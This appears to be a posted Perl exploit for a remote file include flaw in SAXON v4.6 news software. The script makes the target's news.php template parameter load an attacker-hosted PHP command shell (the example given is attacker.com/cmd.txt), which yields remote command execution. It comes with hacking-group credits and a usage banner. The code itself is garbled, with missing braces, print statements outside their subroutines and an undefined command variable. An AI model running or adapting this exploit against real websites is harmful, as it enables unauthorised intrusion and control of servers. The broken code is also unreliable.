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Simple Accessible XHTML Online News v4.6 Remote File Include Exploit
Simple Accessible XHTML Online News v4.6 Remote File Include Exploit
Simple Accessible XHTML Online News v4.6 Remote File Include Exploit

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    Xmor$ Security Vulnerability Research TM

# Tilte: SAXON : Simple Accessible XHTML Online News v4.6 Remote File Include Exploit

# Author..................: [the_Edit0r]
# Location ...............: [Iran]
# Homepage ...............: [Www.XmorS-sEcurity.coM] 
[Www.XmorS.coM] [Www.XmorS.neT] 
# Software ...............: [SAXON] 
# Impact..................: [Remote]
# Advisory ...............: [Www.XmorS-sEurity.coM/advisory/SAXON(rfi).txt] 
# Site Script ............: [http://www.blackwidows.co.uk] 
# We ArE .................: [Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel]
# SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM] 
# Vulnerabilities ........: 


-------------------------------- Exploit --------------------------------------------


use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}


       print "[shell] \$";

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'news.php?template='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nWellcome Command !\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

       $finreturn = $1;
       $finreturn=~ tr/[....]/[\n]/;
       print "\r\n$finreturn\n\r";

else {print "[shell] \$";}}}last;

sub head()
 print " * SAXON v4.6 Remote File Include Exploit*\r\n";
sub usage()
 print " Usage: Xpl.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
print "  - Full path to SAXON ex: http://www.site.com/ \r\n"; 
print "  - Path to cmd Shell e.g http://www.attacker.com/cmd.txt \r\n"; 
 print "  - Command variable used in php shell \r\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".        SAXON remote Command Execution Vulnerabilities       .\n";
 print ".                                                             .\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".         Xmor$ Security Vulnerability Research TM            .\n";
 print ".                                                             .\n";
 print "...............................................................\n\n";

--------------------------------- End Codes ------------------------------------------

# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]

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